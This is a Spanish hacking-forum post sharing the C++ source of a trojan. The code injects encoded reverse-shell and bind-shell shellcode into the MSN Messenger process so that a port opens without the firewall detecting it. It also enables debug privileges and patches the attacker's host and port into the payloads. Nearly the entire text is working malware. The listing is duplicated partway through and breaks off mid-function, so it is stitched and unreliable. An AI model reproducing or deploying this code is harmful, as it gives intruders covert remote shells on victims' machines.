http://www.hackxcrack.com/phpBB2/viewtopic.php?t=18108
Respecto de "DLL INJECTION" para evitar el cortafuegos, encontré en la web este código de un troyano que, teóricamente, realizaría una DLL injection y abriría un puerto sin que el firewall se entere, bajo la técnica de hacerle creer que quien lo hace es un proceso autorizado, por ejemplo el MSN.
Código:
// Akiles.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <Tlhelp32.h> //libreria para procesos
#pragma comment(lib, "ws2_32.lib")
// Size of every region allocated in the target process with VirtualAllocEx and,
// more importantly, the byte count passed to each WriteProcessMemory call below.
// NOTE(review): the objects actually copied (RemoteGetHostByName, a struct Data,
// the RShell array) are all shorter than 4096 bytes, so each copy reads past its source.
const DWORD MAXINJECTSIZE = 4096;
// Port patched into the payload bytes by SetShell().
unsigned int Port = 63000;
// Host name resolved inside the target process by RemoteGetHostByName(); copied
// into struct Data::Host (100 bytes) with an unbounded strcpy in ResolucionIpInjection().
char *Host = "localhost";
// Function-pointer types for the two Winsock routines the remote code calls; the
// addresses are resolved with GetProcAddress in ResolucionIpInjection() and carried
// over in struct Data.
typedef hostent *(__stdcall *PGetHostByName)(const char*);
typedef int (__stdcall *PWSAStartup)(WORD,LPWSADATA);
unsigned char DShell[] =
"\x43\x43\x43\x43\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01"
"\xea\x52\x8b\x52\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01"
"\xee\x31\xff\xc1\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75"
"\xea\x5a\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb"
"\x8b\x04\x8b\x01\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30"
"\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c"
"\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8"
"\xfe\xe8\x90\xff\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff"
"\x54\x31\xc0\xfe\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff"
"\xff\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79"//164
"\xe8\x61\xff\xff\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x00\x00"//165//\x70\xcc port 28876
"\xfe\xcc\x50\x89\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8"
"\x42\xff\xff\xff\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff"
"\xff\xff\x58\x60\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23"
"\xff\xff\xff\x89\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41"
"\x31\xdb\x56\x56\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53"
"\x53\x53\x53\x53\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54"
"\x50\x53\x53\x53\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0"
"\x05\xd0\xe8\xdf\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb"
"\x8d\x5f\xe8\xcf\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8"
"\xc2\xfe\xff\xff\x83\xc4\x5c\x61\xeb\x89";
//rebienta proceso
char RShell[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
// Parameter block for RemoteGetHostByName(): ResolucionIpInjection() fills it in
// this process, copies it into the target with WriteProcessMemory, and reads it
// back after the remote thread finishes to collect Sin.
struct Data
{
WSADATA wsaData; // filled by the WSAStartup call made in the target
sockaddr_in Sin; // output: sin_addr receives the first address of the lookup
WORD MakeWord; // Winsock version requested from WSAStartup (MAKEWORD(2,0))
PGetHostByName pFuncGetHostByName; // gethostbyname address, resolved in this process
PWSAStartup pFuncWSAStartup; // WSAStartup address, resolved in this process
hostent *hServ; // lookup result; a pointer into the target's address space, not usable after read-back
char Host[100]; // NUL-terminated host name to resolve (copied from the global Host)
};
// Walks a Toolhelp process snapshot and returns the PID of the first entry whose
// szExeFile equals Name (case-sensitive strcmp). Returns 0 when the snapshot cannot
// be taken or nothing matches; the Process32First failure path returns FALSE, which
// is also 0, so callers cannot tell "not found" from "enumeration failed".
int GetProcessId(char *Name)
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD dwPriorityClass;
char ProcessID[10]=""; // unused
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
return 0;
}
// Set the size of the structure before using it.
pe32.dwSize = sizeof( PROCESSENTRY32 );
// Retrieve information about the first process,
// and exit if unsuccessful
if( !Process32First( hProcessSnap, &pe32 ) )
{
//printError( "Process32First" ); // Show cause of failure
CloseHandle( hProcessSnap ); // Must clean up the snapshot object!
return( FALSE );
}
// NOTE(review): this Process32Next overwrites the entry Process32First just returned
// before the loop body runs, so the first snapshot entry is never compared with Name.
Process32Next( hProcessSnap, &pe32 );
do
{
// Retrieve the priority class.
dwPriorityClass = 0;
// NOTE(review): the OpenProcess result is not checked before GetPriorityClass/CloseHandle;
// PROCESS_ALL_ACCESS is requested only to read the priority class.
hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
dwPriorityClass = GetPriorityClass( hProcess );
CloseHandle( hProcess );
// Diagnostic: prints the priority class of every visited process (DWORD printed with %d).
if( dwPriorityClass )
printf( "\n Priority Class = %d", dwPriorityClass );
if(!strcmp(Name,pe32.szExeFile))
{
CloseHandle( hProcessSnap );
return pe32.th32ProcessID;
}
} while( Process32Next( hProcessSnap, &pe32 ) );
// Don't forget to clean up the snapshot object!
CloseHandle( hProcessSnap );
return 0;
}
// Executed inside the target process: ResolucionIpInjection() copies this function's
// bytes there and starts it with CreateRemoteThread, passing the remote copy of
// struct Data as RData. It calls Winsock only through the function pointers carried
// in RData (WSAStartup, then gethostbyname on RData->Host) and stores the first
// resolved address in RData->Sin.sin_addr for the injector to read back.
// NOTE(review): neither the WSAStartup result nor hServ is checked, so a failed lookup
// dereferences a null hostent in the target. Running a byte copy of this function at
// a different address presumably relies on it referencing nothing from this module —
// not verifiable from the source alone.
DWORD __stdcall RemoteGetHostByName(struct Data *RData)
{
RData->pFuncWSAStartup(RData->MakeWord,&RData->wsaData);
RData->hServ= (struct hostent *)RData->pFuncGetHostByName(RData->Host);
RData->Sin.sin_addr = *((struct in_addr *)RData->hServ->h_addr);
return 1;
}
// Resolves the global Host to an IPv4 address from inside the target process and
// returns it through Sin. Two PAGE_EXECUTE_READWRITE regions are allocated in
// hProcess, the bytes of RemoteGetHostByName() go into one and a filled struct Data
// into the other, CreateRemoteThread runs the copied code with the remote Data
// pointer as argument, and the Data block is read back once the thread has exited.
// Returns 1 after the read-back, 0 if an allocation, write or thread creation fails.
// NOTE(review): the success path never closes ht, and the cleanup label calls
// CloseHandle(ht) while ht may still be 0.
bool ResolucionIpInjection( HANDLE hProcess,sockaddr_in &Sin)
{
HANDLE ht = 0;
void *p = 0;
struct Data *c=0;
DWORD rc; // receives the remote thread id, then is reused for the WaitForSingleObject result
struct Data RData;
::ZeroMemory( &RData, sizeof(struct Data));
// Function addresses are looked up here and carried over in RData. Neither the
// LoadLibrary nor the GetProcAddress results are checked, so a failed lookup hands
// null pointers to the remote code, which calls them unconditionally.
RData.pFuncGetHostByName = (PGetHostByName)GetProcAddress(LoadLibrary("wsock32.dll"), "gethostbyname" );
RData.pFuncWSAStartup = (PWSAStartup)GetProcAddress(LoadLibrary("wsock32.dll"), "WSAStartup" );
RData.MakeWord = MAKEWORD(2 ,0);
// NOTE(review): unbounded copy into the 100-byte Host field; the "localhost" literal
// fits, a longer Host value would overflow it.
strcpy(RData.Host,Host);
// reserve memory in the remote process
p = VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( p == 0 )
goto cleanup;
c =(struct Data *) VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( c == 0 )
goto cleanup;
// copy the function's bytes into the reserved region
// NOTE(review): MAXINJECTSIZE (4096) bytes are copied from the function's address
// rather than its real length, so this reads past the function; the RData copy
// below likewise reads past the struct, which is far smaller than 4096 bytes.
if ( ! WriteProcessMemory( hProcess, p, &RemoteGetHostByName, MAXINJECTSIZE, 0 ) )
goto cleanup;
// copy the parameter block into the reserved region
if ( ! WriteProcessMemory( hProcess, c, &RData, MAXINJECTSIZE, 0 ) )
goto cleanup;
// run the copied function remotely, with the remote Data block as its argument
ht = CreateRemoteThread( hProcess, 0, 0, (DWORD (__stdcall *)( void *)) p, c, 0, &rc );
if ( ht == NULL )
goto cleanup;
// Blocks until the remote thread exits. Neither this result nor the ReadProcessMemory
// result is checked, so Sin is assigned (and 1 returned) even if the read-back failed.
rc = WaitForSingleObject( ht, INFINITE );
ReadProcessMemory(hProcess,c,&RData,sizeof(struct Data),0);
Sin = RData.Sin;
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
if ( c != 0 )
VirtualFreeEx( hProcess, c, 0, MEM_RELEASE );
return 1;
cleanup:
CloseHandle( ht );
// Let's clean
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
if ( c != 0 )
VirtualFreeEx( hProcess, c, 0, MEM_RELEASE );
return 0;
}
// Copies the RShell payload into a freshly allocated PAGE_EXECUTE_READWRITE region
// of hProcess and starts a remote thread at its first byte, with no argument.
// Returns 1 as soon as the thread has been created, 0 if the allocation, the write
// or the thread creation fails (the region is released on that path only).
// NOTE(review): on success ht is never closed and the region is never freed — the
// latter presumably deliberate since the new thread executes from it; the cleanup
// label closes ht while it may still be 0. As in ResolucionIpInjection(),
// MAXINJECTSIZE bytes are copied although RShell is much shorter, so the write
// reads past the array. The post text after the listing says to pass &DShell
// instead of &RShell to select the other payload.
bool ShellInjection( HANDLE hProcess)
{
HANDLE ht = 0;
void *p = 0;
DWORD rc; // receives the remote thread id; never read
// reserve memory in the remote process
p = VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( p == 0 )
goto cleanup;
// copy the payload into the reserved region
if ( ! WriteProcessMemory( hProcess, p, &RShell, MAXINJECTSIZE, 0 ) )
goto cleanup;
// run the copied bytes remotely
ht = CreateRemoteThread( hProcess, 0, 0, (DWORD (__stdcall *)( void *)) p, NULL, 0, &rc );
if ( ht == NULL )
goto cleanup;
return 1;
cleanup:
CloseHandle( ht );
// Let's clean
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
return 0;
}
// Reports whether the running OS belongs to the Windows NT family. Queries
// GetVersionEx with the OSVERSIONINFOEX layout first and retries with the plain
// OSVERSIONINFO layout if that is rejected; returns FALSE when both calls fail.
BOOL IsWindowsNT()
{
OSVERSIONINFOEX osvi;
BOOL bOsVersionInfoEx;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi);
if( bOsVersionInfoEx == 0 )
{
// Fall back to the smaller structure; only the common prefix is needed below.
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) )
return FALSE;
}
return osvi.dwPlatformId == VER_PLATFORM_WIN32_NT;
}
// Tries to enable SeDebugPrivilege on the current process token. Failures are
// reported with wprintf and otherwise ignored; there is no return value, so the
// caller (WinMain) cannot tell whether the privilege is actually held.
// NOTE(review): GetLastError() returns a DWORD, so %d is a mismatched format for it.
// A nonzero AdjustTokenPrivileges return also does not mean the privilege was
// granted: the documented check is GetLastError() == ERROR_SUCCESS afterwards
// (ERROR_NOT_ALL_ASSIGNED means the token does not hold the privilege).
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
{
wprintf( L"OpenProcessToken() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
return;
}
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
{
wprintf( L"LookupPrivilegeValue() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
CloseHandle( hToken );
return;
}
// Single-entry privilege array: enable the LUID looked up above.
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
wprintf( L"AdjustTokenPrivileges() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
CloseHandle( hToken );
}
// Returns byte XOR 0x92. SetShell() passes every address and port byte it patches
// into RShell through this before storing it.
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
// Patches both payload arrays in place before injection: resolves Host (through the
// target process) and writes the xor_data()-encoded address octets and port bytes
// into fixed RShell offsets, and writes Port big-endian into DShell[174..175].
// NOTE(review): the ResolucionIpInjection() result is ignored, so on failure Sin is
// read uninitialised. ip_addr, i, j, port and encoded_ip are never read; the strncpy
// into ip_addr is dead code (and with a 20-byte limit would not NUL-terminate anyway).
void SetShell(HANDLE hProcess)
{
char ip_addr[256];
unsigned long encoded_port = 0;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 63000;
unsigned long encoded_ip = 0;
struct sockaddr_in Sin;
// host name -> IP resolution
ResolucionIpInjection(hProcess,Sin);
// reverse-shell port initialisation
strncpy(ip_addr, Host, 20);
// On a little-endian host, htonl() of the 16-bit Port leaves its two bytes in the
// upper half of the value, which the >>16 and >>24 extractions below pick out.
// The purpose of the +2 is not evident from this file.
encoded_port = htonl(Port);
encoded_port += 2;
RShell[184] = (char) 0x90;
RShell[185] = (char) 0x92;
RShell[186] = xor_data((char)((encoded_port >> 16) & 0xff));
RShell[187] = xor_data((char)((encoded_port >> 24) & 0xff));
// reverse-shell IP initialisation: one octet per byte, each encoded with xor_data()
raw_num = Sin.sin_addr.S_un.S_un_b.s_b1;
RShell[179] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b2;
RShell[180] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b3;
RShell[181] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b4;
RShell[182] = xor_data((char)raw_num);
// direct-shell port initialisation: high byte, then low byte
DShell[174] = (0xFF00 & Port) >> 8;
DShell[175] = 0x00FF & Port;
}
// Entry point. Looks up the PID of "msnmsgr.exe", bails out on non-NT Windows,
// attempts to enable SeDebugPrivilege, opens the target with the thread-creation and
// memory access rights the injection routines use, then patches the payload
// (SetShell) and injects it (ShellInjection). Returns 1 if the target could be
// opened, 0 otherwise.
// NOTE(review): a 0 from GetProcessId (target not running) is passed straight to
// OpenProcess rather than rejected, the snapshot is taken before the OS check, and
// the ShellInjection result is ignored. hInstance, hPrevInstance, lpCmdLine and
// nCmdShow are unused.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
HANDLE hProcess;
int Pid = GetProcessId("msnmsgr.exe");
if ( !IsWindowsNT())
return 0;
EnableDebugPriv();
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, Pid);
if ( hProcess != NULL )
{
SetShell(hProcess);
ShellInjection( hProcess);
CloseHandle( hProcess );
}
else
return 0;
return 1;
}
//
#include "stdafx.h"
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <Tlhelp32.h> //libreria para procesos
#pragma comment(lib, "ws2_32.lib")
// Size of every region allocated in the target process with VirtualAllocEx and,
// more importantly, the byte count passed to each WriteProcessMemory call below.
// NOTE(review): the objects actually copied (RemoteGetHostByName, a struct Data,
// the RShell array) are all shorter than 4096 bytes, so each copy reads past its source.
const DWORD MAXINJECTSIZE = 4096;
// Port patched into the payload bytes by SetShell().
unsigned int Port = 63000;
// Host name resolved inside the target process by RemoteGetHostByName(); copied
// into struct Data::Host (100 bytes) with an unbounded strcpy in ResolucionIpInjection().
char *Host = "localhost";
// Function-pointer types for the two Winsock routines the remote code calls; the
// addresses are resolved with GetProcAddress in ResolucionIpInjection() and carried
// over in struct Data.
typedef hostent *(__stdcall *PGetHostByName)(const char*);
typedef int (__stdcall *PWSAStartup)(WORD,LPWSADATA);
unsigned char DShell[] =
"\x43\x43\x43\x43\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01"
"\xea\x52\x8b\x52\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01"
"\xee\x31\xff\xc1\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75"
"\xea\x5a\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb"
"\x8b\x04\x8b\x01\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30"
"\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c"
"\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8"
"\xfe\xe8\x90\xff\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff"
"\x54\x31\xc0\xfe\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff"
"\xff\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79"//164
"\xe8\x61\xff\xff\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x00\x00"//165//\x70\xcc port 28876
"\xfe\xcc\x50\x89\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8"
"\x42\xff\xff\xff\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff"
"\xff\xff\x58\x60\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23"
"\xff\xff\xff\x89\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41"
"\x31\xdb\x56\x56\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53"
"\x53\x53\x53\x53\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54"
"\x50\x53\x53\x53\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0"
"\x05\xd0\xe8\xdf\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb"
"\x8d\x5f\xe8\xcf\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8"
"\xc2\xfe\xff\xff\x83\xc4\x5c\x61\xeb\x89";
//rebienta proceso
char RShell[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
// Parameter block for RemoteGetHostByName(): ResolucionIpInjection() fills it in
// this process, copies it into the target with WriteProcessMemory, and reads it
// back after the remote thread finishes to collect Sin.
struct Data
{
WSADATA wsaData; // filled by the WSAStartup call made in the target
sockaddr_in Sin; // output: sin_addr receives the first address of the lookup
WORD MakeWord; // Winsock version requested from WSAStartup (MAKEWORD(2,0))
PGetHostByName pFuncGetHostByName; // gethostbyname address, resolved in this process
PWSAStartup pFuncWSAStartup; // WSAStartup address, resolved in this process
hostent *hServ; // lookup result; a pointer into the target's address space, not usable after read-back
char Host[100]; // NUL-terminated host name to resolve (copied from the global Host)
};
// Walks a Toolhelp process snapshot and returns the PID of the first entry whose
// szExeFile equals Name (case-sensitive strcmp). Returns 0 when the snapshot cannot
// be taken or nothing matches; the Process32First failure path returns FALSE, which
// is also 0, so callers cannot tell "not found" from "enumeration failed".
int GetProcessId(char *Name)
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD dwPriorityClass;
char ProcessID[10]=""; // unused
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
return 0;
}
// Set the size of the structure before using it.
pe32.dwSize = sizeof( PROCESSENTRY32 );
// Retrieve information about the first process,
// and exit if unsuccessful
if( !Process32First( hProcessSnap, &pe32 ) )
{
//printError( "Process32First" ); // Show cause of failure
CloseHandle( hProcessSnap ); // Must clean up the snapshot object!
return( FALSE );
}
// NOTE(review): this Process32Next overwrites the entry Process32First just returned
// before the loop body runs, so the first snapshot entry is never compared with Name.
Process32Next( hProcessSnap, &pe32 );
do
{
// Retrieve the priority class.
dwPriorityClass = 0;
// NOTE(review): the OpenProcess result is not checked before GetPriorityClass/CloseHandle;
// PROCESS_ALL_ACCESS is requested only to read the priority class.
hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
dwPriorityClass = GetPriorityClass( hProcess );
CloseHandle( hProcess );
// Diagnostic: prints the priority class of every visited process (DWORD printed with %d).
if( dwPriorityClass )
printf( "\n Priority Class = %d", dwPriorityClass );
if(!strcmp(Name,pe32.szExeFile))
{
CloseHandle( hProcessSnap );
return pe32.th32ProcessID;
}
} while( Process32Next( hProcessSnap, &pe32 ) );
// Don't forget to clean up the snapshot object!
CloseHandle( hProcessSnap );
return 0;
}
// Executed inside the target process: ResolucionIpInjection() copies this function's
// bytes there and starts it with CreateRemoteThread, passing the remote copy of
// struct Data as RData. It calls Winsock only through the function pointers carried
// in RData (WSAStartup, then gethostbyname on RData->Host) and stores the first
// resolved address in RData->Sin.sin_addr for the injector to read back.
// NOTE(review): neither the WSAStartup result nor hServ is checked, so a failed lookup
// dereferences a null hostent in the target. Running a byte copy of this function at
// a different address presumably relies on it referencing nothing from this module —
// not verifiable from the source alone.
DWORD __stdcall RemoteGetHostByName(struct Data *RData)
{
RData->pFuncWSAStartup(RData->MakeWord,&RData->wsaData);
RData->hServ= (struct hostent *)RData->pFuncGetHostByName(RData->Host);
RData->Sin.sin_addr = *((struct in_addr *)RData->hServ->h_addr);
return 1;
}
// Resolves the global Host to an IPv4 address from inside the target process and
// returns it through Sin. Two PAGE_EXECUTE_READWRITE regions are allocated in
// hProcess, the bytes of RemoteGetHostByName() go into one and a filled struct Data
// into the other, CreateRemoteThread runs the copied code with the remote Data
// pointer as argument, and the Data block is read back once the thread has exited.
// Returns 1 after the read-back, 0 if an allocation, write or thread creation fails.
// NOTE(review): the success path never closes ht, and the cleanup label calls
// CloseHandle(ht) while ht may still be 0.
bool ResolucionIpInjection( HANDLE hProcess,sockaddr_in &Sin)
{
HANDLE ht = 0;
void *p = 0;
struct Data *c=0;
DWORD rc; // receives the remote thread id, then is reused for the WaitForSingleObject result
struct Data RData;
::ZeroMemory( &RData, sizeof(struct Data));
// Function addresses are looked up here and carried over in RData. Neither the
// LoadLibrary nor the GetProcAddress results are checked, so a failed lookup hands
// null pointers to the remote code, which calls them unconditionally.
RData.pFuncGetHostByName = (PGetHostByName)GetProcAddress(LoadLibrary("wsock32.dll"), "gethostbyname" );
RData.pFuncWSAStartup = (PWSAStartup)GetProcAddress(LoadLibrary("wsock32.dll"), "WSAStartup" );
RData.MakeWord = MAKEWORD(2 ,0);
// NOTE(review): unbounded copy into the 100-byte Host field; the "localhost" literal
// fits, a longer Host value would overflow it.
strcpy(RData.Host,Host);
// reserve memory in the remote process
